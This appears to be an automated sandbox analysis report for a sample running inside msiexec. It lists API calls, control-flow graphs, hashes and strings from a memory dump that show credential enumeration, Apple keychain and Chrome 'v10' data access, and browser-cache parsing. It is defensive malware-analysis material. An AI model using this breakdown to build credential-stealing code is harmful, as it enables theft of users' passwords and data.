                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                      • Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                      APIs
                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                      • LockResource.KERNEL32(00000000), ref: 004148EF
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                      APIs
                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                      • free.MSVCRT ref: 00418803
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                      • String ID:
                      • API String ID: 1355100292-0
                      • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                      • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID:
                      • API String ID: 1690352074-0
                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                      APIs
                      • memset.MSVCRT ref: 0041898C
                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: InfoSystemmemset
                      • String ID:
                      • API String ID: 3558857096-0
                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                      APIs
                      • memset.MSVCRT ref: 004455C2
                      • wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 0044570D
                      • memset.MSVCRT ref: 00445725
                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      • memset.MSVCRT ref: 0044573D
                      • memset.MSVCRT ref: 00445755
                      • memset.MSVCRT ref: 004458CB
                      • memset.MSVCRT ref: 004458E3
                      • memset.MSVCRT ref: 0044596E
                      • memset.MSVCRT ref: 00445A10
                      • memset.MSVCRT ref: 00445A28
                      • memset.MSVCRT ref: 00445AC6
                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      • memset.MSVCRT ref: 00445B52
                      • memset.MSVCRT ref: 00445B6A
                      • memset.MSVCRT ref: 00445C9B
                      • memset.MSVCRT ref: 00445CB3
                      • _wcsicmp.MSVCRT ref: 00445D56
                      • memset.MSVCRT ref: 00445B82
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                      • memset.MSVCRT ref: 00445986
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                      • API String ID: 2263259095-3798722523
                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                      • String ID: $/deleteregkey$/savelangfile
                      • API String ID: 2744995895-28296030
                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                      • wcsrchr.MSVCRT ref: 0040B738
                      • memset.MSVCRT ref: 0040B756
                      • memset.MSVCRT ref: 0040B7F5
                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                      • memset.MSVCRT ref: 0040B851
                      • memset.MSVCRT ref: 0040B8CA
                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memset.MSVCRT ref: 0040BB53
                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                      • String ID: chp$v10
                      • API String ID: 4290143792-2783969131
                      • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                      • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • free.MSVCRT ref: 0040E49A
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                      • wcschr.MSVCRT ref: 0040E3B8
                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                      • API String ID: 3849927982-2252543386
                      • Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                      • Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                      APIs
                      • memset.MSVCRT ref: 004091E2
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                      • String ID:
                      • API String ID: 3715365532-3916222277
                      • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                      • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                      • CloseHandle.KERNEL32(?), ref: 0040E148
                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                      • String ID: bhv
                      • API String ID: 4234240956-2689659898
                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2941347001-70141382
                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                      Control-flow Graph

                      • Executed
                      • Not Executed
